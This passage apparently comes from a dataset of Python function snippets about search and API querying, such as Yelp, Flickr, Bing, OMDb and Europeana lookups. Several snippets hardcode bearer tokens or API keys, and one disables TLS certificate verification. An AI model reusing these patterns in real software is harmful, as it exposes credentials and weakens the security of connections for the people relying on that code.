show is found, generate status message\n status_msg = \"No TV Show found. Try another.\"\n status_num = 3\n\n if movie_result[\"total_results\"] == 0 and tv_result[\"total_results\"] == 0:\n # if no movie and tv show found, generate status message.\n # in the case they are found, but not based on the book, generate the same message\n status_msg = \"No adaptation found for {0}. Try another.\".format(search_term)\n status_num = 4\n\n if previous_searches.count(\n gr_result[\"name_split\"]) == 0 and status_num != 4: # only add if book name is not in deque\n if len(previous_searches) == 5: # keep the deque at only five most recent searches\n previous_searches.pop() # remove one if there is already five\n previous_searches.appendleft(gr_result[\"name_split\"]) # add recent search to beginning of deque\n # render the page again with updated information, pass all data to render_template method\n return render_template(\"index.html\", book_id=book_id, book_data=gr_result, movie_data=movie_result,\n tv_data=tv_result, app_name=app_name, search=search_term, status_msg=status_msg,\n status_num=status_num, previous_searches=previous_searches)",
"def getResults(self, name):\n returnString = marketSet[name].getResults()\n marketSet[name].webCrawler.nextPage()\n return json.dumps(returnString, cls=Encoder)",
"def results(self, query=None, batch=True, b_size=10, b_start=0):\n # Disable theming for ajax requests\n if 'ajax' in self.request.form:\n del self.request.form['ajax']\n self.request.response.setHeader('X-Theme-Disabled', 'True')\n\n if query is None:\n query = {}\n\n query['b_start'] = b_start = int(b_start)\n query['b_size'] = b_size\n query = self.filter_query(query)\n\n if query is None:\n results = []\n else:\n query.update({'qt': 'hlsearch'});\n catalog = getToolByName(self.context, 'portal_catalog')\n try:\n results = catalog(**query)\n except ParseError:\n logger.exception('Exception while searching')\n return []\n except SolrException:\n logger.exception('Exception while searching')\n return []\n\n self.solr_response = results\n results = IContentListing(results)\n if batch:\n results = Batch(results, b_size, b_start)\n return results",
"def GetResults(self):\n return self._results",
"def _mw_search(self, baseurl, searchquery):\n params = urllib.parse.urlencode({\n 'action': 'opensearch',\n 'search': searchquery,\n 'format': 'json',\n })\n api_data = self._mw_api_call(baseurl, params)\n\n search_result_titles = api_data[1]\n if not search_result_titles:\n raise callbacks.Error(f\"No search results for {searchquery!r}\")\n return search_result_titles",
"def _collect_results(self, request_method, request_args, request_kwargs={}, request_params={}):\n results = []\n cursor = None\n page_params = copy.copy(request_params)\n\n while True:\n if cursor:\n page_params['cursor'] = cursor\n response = request_method(\n *request_args,\n **request_kwargs,\n params=page_params\n )\n _raise_on_error(response)\n response_json = response.json()\n results.extend(response_json['results'])\n if response_json['next']:\n cursor = get_cursor_from_url(response_json['next'])\n else:\n return results",
"def search_results(self):\r\n route_name = self.request.matched_route.name\r\n mdict = self.matchdict\r\n rdict = self.GET\r\n\r\n if 'terms' in mdict:\r\n phrase = \" \".join(mdict['terms'])\r\n else:\r\n phrase = rdict.get('search', '')\r\n\r\n # Always search the fulltext content\r\n with_content = True\r\n\r\n conn_str = self.settings.get('sqlalchemy.url', False)\r\n searcher = get_fulltext_handler(conn_str)\r\n\r\n # check if we have a page count submitted\r\n params = self.params\r\n page = params.get('page', 0)\r\n count = params.get('count', 50)\r\n\r\n if rdict.get('search_mine') or 'username' in mdict:\r\n with_user = True\r\n else:\r\n with_user = False\r\n\r\n username = None\r\n if with_user:\r\n if 'username' in mdict:\r\n username = mdict.get('username')\r\n elif self.request.user and self.request.user.username:\r\n username = self.request.user.username\r\n\r\n res_list = searcher.search(\r\n phrase,\r\n content=with_content,\r\n username=username if with_user else None,\r\n ct=count,\r\n page=page,\r\n )\r\n\r\n # if the route name is search_ajax we want a json response\r\n # else we just want to return the payload data to the mako template\r\n if 'ajax' in route_name or 'api' in route_name:\r\n return {\r\n 'success': True,\r\n 'message': \"\",\r\n 'payload': {\r\n 'search_results': [dict(res) for res in res_list],\r\n 'result_count': len(res_list),\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'username': username,\r\n }\r\n }\r\n else:\r\n return {\r\n 'search_results': res_list,\r\n 'count': len(res_list),\r\n 'max_count': 50,\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'username': username,\r\n }",
"def search_all_view(request): # searchAll\n voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id\n text_from_search_field = request.GET.get('text_from_search_field', '')\n search_scope_list = request.GET.getlist('search_scope_list[]')\n search_scope_list = list(filter(None, search_scope_list))\n # search_scope_list options\n # PN = POLITICIAN_NAME\n\n if not positive_value_exists(text_from_search_field):\n status = 'MISSING_TEXT_FROM_SEARCH_FIELD'\n json_data = {\n 'status': status,\n 'success': False,\n 'text_from_search_field': text_from_search_field,\n 'voter_device_id': voter_device_id,\n 'search_results': [],\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')\n\n results = search_all_for_api(\n text_from_search_field=text_from_search_field,\n voter_device_id=voter_device_id,\n search_scope_list=search_scope_list)\n # results = search_all_elastic_for_api(text_from_search_field, voter_device_id) #\n status = \"UNABLE_TO_FIND_ANY_SEARCH_RESULTS \"\n search_results = []\n if results['search_results_found']:\n search_results = results['search_results']\n status = results['status']\n else:\n status += results['status']\n\n json_data = {\n 'status': status,\n 'success': True,\n 'text_from_search_field': text_from_search_field,\n 'voter_device_id': voter_device_id,\n 'search_results': search_results,\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')",
"def query_google(lat='38.890762', lon='-77.084755', radius='400', keywords=['coffee', 'cafe', 'brunch']):\n base_url = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json\"\n location = f\"{lat}, {lon}\"\n for kw in keywords:\n params = {\n \"key\": codecs.decode(config['google']['api_key'], 'rot-13'),\n \"type\": 'food',\n \"rankby\": 'prominence',\n \"location\": location,\n \"radius\": radius,\n \"keyword\": kw\n }\n\n try:\n response = requests.get(base_url, params=params).json()\n key_results_list = response['results']\n except Exception as e:\n print(f'error in query_google {e}')\n\n #passes to this point\n print(f'query_google - key_results_list: {key_results_list}')\n\n if \"next_page_token\" in response:\n params = {\n \"key\": codecs.decode(config['google']['api_key'], 'rot-13'),\n \"type\": 'food',\n \"rankby\": 'prominence',\n \"location\": location,\n \"radius\": radius,\n \"keyword\": kw,\n \"pagetoken\": response[\"next_page_token\"]\n }\n\n response_next_page = requests.get(base_url, params=params).json()\n key_results_list = key_results_list + response_next_page['results']\n print(response_next_page)\n\n else:\n print(\"no next page\")\n\n for kr in key_results_list:\n kr[\"keyword\"] = kw\n print(f'key results list length is: {len(kr)}')\n\n #db.get_collection(\"google_places\").delete_many({}) # This needs to be moved into Flask to aggregate results\n db.get_collection(\"google_places\").insert_many(key_results_list)",
"def _parse_json_response(self, query, results):\n\n response = Response(query.terms, query)\n content = json.loads(results.text)\n\n result_type = query.result_type\n if not result_type:\n result_type = self.default_result_type\n\n # Check to see if the response contains any API errors.\n self._check_errors(content)\n\n # By default, Facebook returns 5000 results. While it returns a pagination key, it seems to do nothing.\n response.no_more_results = True\n\n if result_type== 'user' or not query.result_type:\n # Sample response\n # {\n # \"data\": [\n # {\n # \"name\": \"John Doe\",\n # \"id\": \"999999999999999\"\n # },\n # {\n # \"name\": \"John Doe\",\n # \"id\": \"88888888888888\"\n # }\n # ],\n # \"paging\": {\n # \"next\": \"long_url\"\n # }\n # }\n\n # The base URL is used to create the link to the profile, it will redirect to a permanent user URL.\n base_url= \"https://www.facebook.com/app_scoped_user_id/\"\n\n for user in content[u'data']:\n name = user[u'name']\n tempid = user[u'id']\n url = base_url + tempid + '/'\n text=''\n img = \"https://graph.facebook.com/{}/picture?type=normal\".format(tempid)\n # Minimal information, probably need a second round of querying the API for each user to get something\n # for the snippet. Better way?\n response.add_result(title=name, url=url, summary=text, imageurl=img)\n\n # Implement the other search types!\n return response",
"def search_results(request):\r\n mdict = request.matchdict\r\n rdict = request.GET\r\n\r\n if 'terms' in mdict:\r\n phrase = \" \".join(mdict['terms'])\r\n else:\r\n phrase = rdict.get('search', '')\r\n\r\n if rdict.get('search_mine') or 'username' in mdict:\r\n with_user = True\r\n else:\r\n with_user = False\r\n\r\n username = None\r\n if with_user:\r\n if 'username' in mdict:\r\n username = mdict.get('username')\r\n elif request.user and request.user.username:\r\n username = request.user.username\r\n\r\n # with content is always in the get string\r\n search_content = asbool(rdict.get('with_content', False))\r\n\r\n conn_str = request.registry.settings.get('sqlalchemy.url', False)\r\n searcher = get_fulltext_handler(conn_str)\r\n\r\n # check if we have a page count submitted\r\n page = rdict.get('page', 0)\r\n count = rdict.get('count', 10)\r\n\r\n try:\r\n res_list = searcher.search(\r\n phrase,\r\n content=search_content,\r\n username=username if with_user else None,\r\n ct=count,\r\n page=page\r\n )\r\n except ValueError:\r\n request.response.status_int = 404\r\n ret = {'error': \"Bad Request: Page number out of bound\"}\r\n return _api_response(request, ret)\r\n\r\n constructed_results = []\r\n for res in res_list:\r\n return_obj = dict(res)\r\n return_obj['tags'] = [dict(tag[1]) for tag in res.tags.items()]\r\n\r\n # the hashed object is there as well, we need to pull the url and\r\n # clicks from it as total_clicks\r\n return_obj['url'] = res.hashed.url\r\n return_obj['total_clicks'] = res.hashed.clicks\r\n\r\n constructed_results.append(return_obj)\r\n\r\n return _api_response(request, {\r\n 'search_results': constructed_results,\r\n 'result_count': len(constructed_results),\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'with_content': search_content,\r\n 'username': username,\r\n })",
"def get_search_results(rows, cursor):\n search_url = 'http://www.europeana.eu/api/v2/search.json?wskey=' + \\\n config.APIKEY + \\\n '&profile=minimal&rows=%d' + \\\n '&cursor=%s' + \\\n '&query=%s'\n\n # split query off to better deal with escaping\n search_query = '*%3A*' + \\\n '&qf=DATA_PROVIDER%3A%22Nationalmuseum%2C+Sweden%22' + \\\n '&qf=what%3A+paintings' + \\\n '&qf=PROVIDER%3A%22AthenaPlus%22'\n\n overview_page = urllib2.urlopen(search_url % (rows, cursor, search_query))\n overview_json_data = json.loads(overview_page.read())\n overview_page.close()\n return overview_json_data",
"def query_api(price, location, categories, radius, openat):\n bearer_token = 'B5XYOw2fqoxnXH5dUEaf3Mp57gTsUkGHQBiDa8viH1uYQDlCxox7p9G0b45QVr2BiJkziIGWaPhjdQhd-xtfhf1AUZ9yx2Xejn3GTNPEojfgCAVOn7stSbYvKDJ6WXYx'\n\n response = search(bearer_token, price, location, categories, radius, openat)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(price, location))\n return\n\n business_data = []\n\n for index, biz in enumerate(businesses):\n biz_id = businesses[index]['id']\n response = get_business(bearer_token, biz_id)\n\n business_data.append(response)\n # pprint.pprint(response, indent=2)\n\n # Get reviews for business\n reviews = get_reviews(bearer_token, biz_id)\n\n business_data[index]['reviews'] = reviews\n\n return business_data",
"def get_search_parameters(self, name):\n\t\tparams = {}\n\t\tparams[\"term\"] = str(name)\n\t\tparams[\"sort\"] = \"0\"\n\t\tparams[\"radius.filter\"] = \"2000\"\n\t\tparams[\"limit\"] = \"1\" #return the first search item\n\t\tparams[\"location\"] = \"Mesa, AZ\"\n\t\treturn params",
"def perform_search(sdk: Intel, srch: str, types: list, tformat: str, rev: bool, prfx: str):\n print(f\"Searching Falcon Threat Intelligence for {bold(srch)}.\")\n # Search each result type asynchronously\n futures = {}\n with ThreadPoolExecutor() as executor:\n if \"actor\" in types:\n futures[\"actors\"] = executor.submit(\n batch_get, func=sdk.query_actor_entities, filt=f\"name:*'*{srch}*'\", catg=\"actor\"\n )\n if \"indicator\" in types:\n futures[\"indicators\"] = executor.submit(\n batch_get, func=sdk.query_indicator_entities,\n filt=f\"indicator:*'*{srch}*'\", catg=\"indicator\"\n )\n if \"report\" in types:\n futures[\"reports\"] = executor.submit(\n batch_get, func=sdk.query_report_entities, filt=f\"name:*'*{srch}*'\", catg=\"report\"\n )\n act_result, ind_result, rep_result = ([], [], [])\n for cat, fut in futures.items():\n if cat == \"actors\":\n act_result = fut.result()\n display_actors(act_result, rev, tformat, prfx)\n\n if cat == \"indicators\":\n ind_result = fut.result()\n display_indicators(ind_result, rev, tformat, prfx)\n\n if cat == \"reports\":\n rep_result = fut.result()\n display_reports(rep_result, rev, tformat, prfx)\n\n if not ind_result and not rep_result and not act_result:\n not_found(types, srch)\n\n return len(act_result), len(ind_result), len(rep_result)",
"def search(self):\n premium = self.config.get('premium', False)\n\n self.params[self.opts['keyword']['query_key']] = self.config[self.opts['keyword']['config_key']] # keyword\n # Selection params\n self.append_param('tag_mode', 'selection')\n if premium:\n self.append_param('order_premium', 'selection')\n else:\n self.append_param('order_not_premium', 'selection')\n\n self.append_param('type', 'selection')\n self.append_param('tool', 'selection')\n self.append_param('ratio', 'selection')\n self.append_param('mode', 'selection')\n\n # Number params\n self.append_param('min_width', 'number')\n self.append_param('max_width', 'number')\n self.append_param('min_height', 'number')\n self.append_param('max_height', 'number')\n if premium:\n self.append_param('min_bookmark', 'number')\n self.append_param('max_bookmark', 'number')\n else:\n self.set_bookmark_filter()\n\n # Date params\n self.append_param('start_time', 'date')\n self.append_param('end_time', 'date')\n\n # multi work filter\n self.filters['multi'] = self.config.get('download_multi', False)\n\n for i in range(self.config['start_page'], self.config['end_page'] + 1):\n self.params['p'] = i\n self.headers['Referer'] = 'https://www.pixiv.net/'\n url ='https://www.pixiv.net/search.php'\n html = self.session.get(url, headers = self.headers, params = self.params, timeout = 10, proxies = self.proxies)\n\n soup = BeautifulSoup(html.text, 'lxml')\n data_items = json.loads(soup.find('input', id = 'js-mount-point-search-result-list')['data-items'])\n\n return self.extract_work_info(data_items)",
"def get_results_for(t_client, search_q):\n results = t_client.search(q=\"#\"+search_q)\n\n # This can be refactored\n return [\n {\n \"author\": \"@%s\" % t.from_user,\n \"text\": t.text,\n \"id\": t.id,\n \"date_h\": t.created_at.strftime(\"%H:%M:%S %d/%m/%Y\"),\n \"date\": time.mktime(t.created_at.timetuple()),\n } for t in results\n ]",
"def fetch(self, **kwargs):\n page = kwargs.get('page', 1)\n if page is None:\n page = 1\n elif page > self.max_pages:\n page = self.max_pages\n\n start_index = ((page - 1) * self.max_results_per_page)\n\n end_index = kwargs.get('num', start_index + self.max_results_per_page)\n if end_index is None:\n end_index = start_index + self.max_results_per_page\n\n headers = {\n 'Username': self.engine_info['ISCAPE_SEARCH_USERNAME'],\n 'Userkey': self.engine_info['ISCAPE_SEARCH_USER_KEY']\n }\n\n data = {\n 'query': kwargs.pop('query', ''),\n 'installation_id': self.engine_info['INSTALLATION_ID'],\n 'page_start': start_index,\n 'page_end': end_index\n }\n\n if getattr(settings, 'USE_V2_API', False):\n query_endpoint = self.engine_info['QUERY_ENDPOINT'].format(\n data.get('installation_id', ''))\n else:\n query_endpoint = self.engine_info['QUERY_ENDPOINT']\n req = requests.Request(\n 'POST',\n query_endpoint,\n headers=headers,\n data=data)\n prepared_request = req.prepare()\n pretty_print_POST(prepared_request)\n session = requests.Session()\n session.verify = False\n\n try:\n response = session.send(prepared_request)\n logger.warning(\" RESPONSE: {0}\".format(response.content))\n response.raise_for_status()\n except Exception as e: # this might have to change for bad responses...\n logger.exception(str(e))\n else:\n return response.json()",
"def _handle_search_results(self, response: TextResponse) -> ScrapyYelpItem:\n\n # get yConfig\n pattern = re.compile(r\"\"\"\\n\\s+yConfig\\s+=\\s+\"\"\", re.MULTILINE | re.DOTALL)\n soup = BeautifulSoup(response.text, \"html.parser\")\n script = soup.find(\"script\", text=pattern)\n myjson = script.get_text()\n # remove start pattern (js assignment)\n s = re.sub(pattern, '', myjson)\n # remove html (parser problems)\n s = re.sub('<[^<]+?>', '', s)\n # remove last semi colon (end-of-data)\n s = s[0:s.rfind(';')]\n json_object = json.loads(s,strict=False)\n\n keys = [x for x in json_object[\"js_display\"][\"hovercard_data\"] if x.isnumeric()]\n # first part is the hovercard data - which contains most of the aggregate biz informative\n # such as total_reviews and summary_score\n df_hovercard_data = pd.DataFrame()\n for x in keys:\n tmpdf = json_normalize(json_object[\"js_display\"][\"hovercard_data\"][x])\n df_hovercard_data = df_hovercard_data.append(tmpdf,ignore_index=True)\n\n df_hovercard_data = df_hovercard_data.set_index(\"result_number\")\n df_hovercard_data.index = df_hovercard_data.index.astype(int)\n # second part is the resourceid which might be useful later on, not sure if this is used at all, but\n # it serves as a good example of how to join to other \"parts\" of the nested json structure and flatten it\n df_markers = json_normalize(json_object[\"js_display\"][\"map_state\"][\"markers\"])\n df_markers = df_markers[df_markers['resourceType'] == 'business'].loc[:, [\"url\",\"resourceId\",\"hovercardId\",\"label\",\"location.latitude\",\"location.longitude\",]]\n df_markers = df_markers.set_index('label')\n df_markers.index = df_markers.index.astype(int)\n\n # combine data into a single dataframe which will eventually be written out by our pipeline\n df = df_hovercard_data.join(df_markers)\n\n # at this point we want to also scrape the indvidual biz listing for the menu, syntax is verbose here\n\n\n ## deubg write to file\n #json_formatted = json.dumps(json_object, indent=2)\n # print(json_formatted)\n # with open(\"files/\"+'blah.json', 'wb') as file:\n # file.write(str.encode(json_formatted))\n\n \"\"\"\n\n Here is a smample of what the yConfig object looks like:\n\n json_object.keys() ====>\n ['cookies', 'gaConfig', 'adjustAndroidPaidTrafficUrl', 'webviewFlow', 'enabledSitRepChannels',\n isWebviewRequest', 'js_display', 'isLoggedIn', 'uaInfo', 'isSitRepEnabled', 'comscore', 'isBugsnagEnabled',\n 'support', 'deprecatedEncryptedYUV', 'vendorExternalURLs', 'smartBannerFallbackActive', 'version',\n 'recaptchaV3PublicKey', 'googlePlacesUrl', 'redesignActive', 'currentBaseLang', 'isClientErrorsEnabled',\n 'uniqueRequestId', 'yelpcodeTemplateVersion', 'appInstallDialogEnabled', 'smartBannerPersistent',\n 'imageUrls', 'siteUrl', 'referrer', 'webviewInfo', 'cookieDomain', 'recaptchaPublicKey',\n 'send_user_agent_to_ga', 'pGifUrl']\n\n\n json_object[\"js_display\"].keys() ===>\n ['polyglot_translations', 'raq_links', 'locale', 'hovercard_data', 'is_first_ad_hovercard_opened',\n 'zoom', 'centerLng', 'map_state', 'advertising_business_id_list', 'centerLat', 'pager']\n\n json_object[\"js_display\"][\"hovercard_data\"] ==>\n '1': {'resource_id': None,\n 'result_number': 1,\n 'biz': {'alias': 'lou-malnatis-pizzeria-chicago',\n 'review_count': 5998,\n 'name': \"Lou Malnati's Pizzeria\",\n 'rating': 4.07785928642881,\n 'url': 'https://m.yelp.com/biz/lou-malnatis-pizzeria-chicago',\n 'price': '$$',\n 'categories': 'Pizza, Italian, Sandwiches',\n 'distance': '2.5 mi'},\n 'lat': 41.890357,\n 'lng': -87.633704,\n 'type': 'natural'},\n '2': {'resource_id': None,\n ....\n\n\n json_object[\"js_display\"][\"map_state\"][\"markers\"] ===>\n [{'resourceType': 'business',\n 'url': '/biz/lou-malnatis-pizzeria-chicago',\n 'resourceId': '8vFJH_paXsMocmEO_KAa3w',\n 'label': '1',\n 'shouldOpenInNewTab': False,\n 'location': {'latitude': 41.890357, 'longitude': -87.633704},\n 'key': 1,\n 'hovercardId': 'Q6nXAEw3UuAVFSztE4lPnA',\n 'icon': {'name': 'business',\n 'anchorOffset': [12, 32],\n 'activeOrigin': [24, 0],\n 'scaledSize': [48, 320],\n 'regularUri': 'https://media0.fl.yelpcdn.com/mapmarkers/yelp_map_range/20160801/1/10.png',\n 'size': [24, 32],\n 'activeUri': 'https://media0.fl.yelpcdn.com/mapmarkers/yelp_map_range/20160801/1/10.png',\n 'regularOrigin': [0, 0]}},\n {'resourceType': 'business',\n 'url': '/biz/pequods-pizzeria-chicago',\n 'resourceId': 'DXwSYgiXqIVNdO9dazel6w',\n 'label': '2',\n 'shouldOpenInNew\n ...\n\n \"\"\"\n #print(json_object[\"js_display\"][\"hovercard_data\"])\n\n\n\n return df",
"def listSearches(self, authenticationToken):\r\n pass",
"def the_search_function(company_name, top_count=5):\n main_company = company_data[company_data.name == company_name].iloc[0]\n\n if top_count == 1:\n search_str = \"\\nSearching for the closest company to %s...\\n\" \\\n % (main_company[\"name\"])\n\n else:\n search_str = \"\\nSearching for top %g closest companies to %s...\\n\" \\\n % (top_count, main_company[\"name\"])\n\n print search_str\n\n matching_companies = match_keywords_descriptions(main_company) \n search_results = search_descriptions(matching_companies, main_company, \n top_count)\n\n if search_results:\n print \"Results:\"\n\n for result in search_results:\n print \"\\t\" + result\n\n else:\n print \"No results available\"",
"def search(query, max: int = None):\n for post in client.search(query, max=max):\n print(json.dumps(post))",
"def lookup(title):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n response = requests.get(\n f\"http://www.omdbapi.com/?s={title}&apikey=ced7be9a\")\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # parse response\n try:\n movie = response.json()\n search = movie[\"Search\"]\n search_list = []\n for i in range(len(search)):\n search_prop = {\"title\": search[i][\"Title\"],\n \"year\": search[i][\"Year\"], \n \"poster\": search[i][\"Poster\"],\n \"id\": search[i][\"imdbID\"]}\n search_list.append(search_prop)\n\n return search_list\n\n except (KeyError, TypeError, ValueError):\n return None",
"def get_search_results(self):\n return self.get_list_of_names(self.SEARCH_RESULTS)",
"def parse_flickr_json(site, query, results):\n response = Response()\n response.version = 'json'\n response.feed.setdefault('title', \"{0}: {1}\".format(site, query))\n response.feed.setdefault('link', results['link'])\n response.feed.setdefault('description', \"Search results for '{0}' at {1}\".format(query, site))\n response.namespaces.setdefault(\"opensearch\", \"http://a9.com/-/spec/opensearch/1.1/\")\n try:\n response.feed.setdefault(\"opensearch_totalresults\", int(results['total']))\n response.feed.setdefault(\"opensearch_itemsperpage\", int(results['perpage']))\n response.feed.setdefault(\"opensearch_startindex\", int(results['page']))\n except KeyError:\n response.feed.setdefault(\"opensearch_totalresults\", 0)\n response.feed.setdefault(\"opensearch_itemsperpage\", 0)\n response.feed.setdefault(\"opensearch_startindex\", 0)\n \n if 'photo' in results:\n for result in results['photo']:\n # Links need to be created from several fields - see the Flickr API for a detailed explanation\n \n try:\n resultLink = \"http://www.flickr.com/photos/{0}/{1}\".format(result['owner'], result['id'])\n resultThumbnail = \"http://farm{0}.static.flickr.com/{1}/{2}_{3}_t.jpg\".format(result['farm'], result['server'], result['id'], result['secret'])\n resultSummary = \"Photo result for '{0}' from {1}\".format(query, site)\n response.entries.append({'title': result['title'], 'link': resultLink, 'summary': resultSummary, 'thumbnail': resultThumbnail})\n except Exception, e:\n print \"Skipping a result due to: {0} \\nWhen parsing a result from: {1}\\n\".format(e, results['link'])\n continue\n \n return response\n\n\t# Try and get the API key from config, if it's not there raise an API Key error - the application will have to deal with this",
"def get_items(id_name, request, client):\n result = client.quick_search(request)\n \n items_pages = []\n limit_to_x_pages = None\n for page in result.iter(limit_to_x_pages):\n items_pages.append(page.get())\n\n items = [item for page in items_pages for item in page['features']]\n \n \n return (id_name, items)",
"def shortsearch(term,location):\n results = search(term,location)['listings']\n result = []\n for business in results:\n result.append([business['id'],business['name'],\"Yellow Pages\"])\n return result",
"def do_search(self, *args, **kwargs):\n return [{}]",
"def __aux_search(self, url, page_limit):\n info = list()\n count = 1\n while True:\n try:\n print(\"[+] Getting page {} result\".format(count))\n if page_limit >= count:\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n count += 1\n if jdata and 'data' in jdata:\n info += jdata['data']\n if response and jdata.get('links', {}).get('next', '') != response.url:\n url = jdata['links']['next']\n else:\n break\n else:\n break\n except Exception as e:\n print(e)\n count += 1\n if page_limit >= count:\n break\n\n return info",
"def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):\n if not title:\n return []\n\n if return_fields is not None:\n return_fields = ','.join(return_fields)\n\n return _get_api('search/',\n title=title,\n fields=return_fields,\n access_token=access_token,\n endpoint=endpoint,\n **search_fields)",
"def api_get_advancedcomputersearch_by_name(name):\n\n auth_tuple = (API_USER, API_PASS)\n headers = { 'Accept': 'application/json' }\n url = f'{API_URL}/JSSResource/advancedcomputersearches/name/{name}'\n\n LOGGER.debug(f'URL generated: {url}')\n\n try:\n r = requests.get(url, auth=auth_tuple, headers=headers)\n except requests.exceptions.RequestException as e:\n LOGGER.error(e)\n return None\n return r.json()",
"def get_results(self):\n return self.results",
"def get_results(self):\n return self.results",
"def test_get_results(self):\n pass",
"def query_api(location):\n #bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n bearer_token ='SHdrjUqMJXqXBKUc7bGIplM8y6tnbwZbXXDbWPCd9wWMP8tX9PdJrC5MZHwJRhb7jMtLjXxT-hsWjNf2OkdiDWd30HsS84AVI5iRnrpxkak3HbWXAdUKvraQ_wgXWXYx'\n response = transaction_search(bearer_token,location)\n response = response.get('businesses')\n return response",
"def getSearch(self, authenticationToken, guid):\r\n pass",
"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Image',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingImageException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [ImageResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def ask(self):\n self.term = str(input(\"What are you looking for? (Coffee, Restaurants, Museums, Bars) \"))\n if self.term.lower() == 'quit':\n sys.exit()\n self.destination = str(input(\"Where are you looking to go? (Neighborhood, City or City, State) \"))\n if self.destination.lower() == 'quit':\n sys.exit()\n \n \n #Request/JSON\n self.request = self.session.get(\"http://api.yelp.com/v2/search\", params={'term': self.term,'location': self.destination})\n self.request = self.request.json()\n \n #Dataframing\n self.menu = json_normalize(self.request['businesses'])\n self.menu.index = list(range(1, 21))\n self.menu = self.menu[['name', 'categories', 'location.address', 'location.city', 'location.coordinate.latitude', \\\n 'location.coordinate.longitude', 'review_count', 'rating', 'snippet_text']]\\\n .sort_values(['rating'], ascending=False).sort_index()",
"def search(api_key, term, location):\n\n\n\n url_params = {\n\n 'term': term.replace(' ', '+'),\n\n 'location': location.replace(' ', '+'),\n\n 'limit': SEARCH_LIMIT\n\n }\n\n return request(API_HOST, SEARCH_PATH, api_key, url_params=url_params)",
"def search_person_get(self, request):\n try:\n search_result = self.get_result_for_activitystream()\n for entry in search_result[\"result\"]:\n obj = entry.get(\"self\", None)\n if obj:\n # not provide object itself, but app specific data\n entry[\"self\"] = None\n entry[\"cs_activitystream_data\"] = _get_person_view(request, obj)\n entry[\"date\"] = dump_datetime(entry[\"date\"])\n return {\"result\": search_result}\n except ESException, e:\n misc.log_traceback(\"Enterprise Search: %s\" % e)\n res = request.ResponseClass(json.dumps(unicode(e)),\n status=HTTPInternalServerError.code,\n content_type=\"application/json\")\n return res",
"def get_data(inp):\n movies = __get_movies(inp)\n series = __get_series(inp)\n\n exist_title(movies, series)\n is_response_larger_than_max_results(movies, series)\n\n search_dict = {}\n\n if movies['Response'] != 'False':\n for movie in movies['Search']:\n search_dict.update({'movie': __get_title_info(movie['imdbID'])})\n\n if series['Response'] != 'False':\n for show in series['Search']:\n search_dict.update({'series': __get_title_info(show['imdbID'])})\n\n return search_dict",
"def results(self, **kwargs):\n\t\ttry:\n\t\t\tdata = self.json(**kwargs)\n\t\texcept TypeError:\n\t\t\traise exceptions.InvalidIcinga2ApiResponseError()\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn tuple(data[\"results\"])\n\t\t\texcept KeyError:\n\t\t\t\treturn tuple()",
"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Video',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingNewsException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [NewsResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def get_data():\n log = common.LogFile('', LOGFILE)\n settings = load_settings()\n keywords = settings[\"keywords\"]\n api_key = settings[\"api_key\"]\n for keyword in keywords:\n print(\"[{}] : fetching data.\".format(keyword))\n filename = \"results_{0}.json\".format(keyword)\n results = {}\n hits_limit = 500\n start_at = 1\n counter = 0\n while True:\n url = create_url(keyword, hits_limit, start_at, api_key)\n records = get_records_from_url(url)\n total_results = get_total_hits(records)\n records = split_records(records)\n records_on_page = len(records)\n if records_on_page == 0:\n break\n else:\n for record in records:\n counter += 1\n id_no = extract_id_number(record)\n processed_dict = {'ID': id_no, 'problem': []}\n processed_record = parse_record(\n record, processed_dict, log)\n if id_no not in results:\n results[id_no] = processed_record\n if counter % 100 == 0:\n print(\"Processed {} out of {}\".format(\n counter, total_results))\n start_at += hits_limit\n time.sleep(THROTTLE)\n print(\"[{}] : fetched {} records to {}.\".format(\n keyword, len(results), filename))\n save_data(results, filename)",
"def process_search_results_for_question(self, question=str, use_adv_search=bool):\n site = self.__site\n # execute the selected search\n if use_adv_search:\n # Note! This returns basically everything without any filtering\n # Therefore, ensure that the result has at least one answer\n search = site.search_advanced(q=question, answers=1)\n else:\n search = site.search(intitle=question, pagesize=self.__PAGE_SIZE)\n # was a result returned?\n if (search is None) or (len(search.items) == 0):\n return False\n\n # Note! If a large result set is returned, it may go through the first result page twice\n # I'm not sure why this happens, but it only happens for the first result page, and only\n # if the result set consists of more than one result page.\n\n for result_sets in search[:self.__PAGE_SIZE]:\n # retrieve the data\n accepted_answer_id = int(self.__is_key_in_json('accepted_answer_id', result_sets.json))\n answer_count = int(self.__is_key_in_json('answer_count', result_sets.json))\n creation_date = result_sets.creation_date\n is_answered = 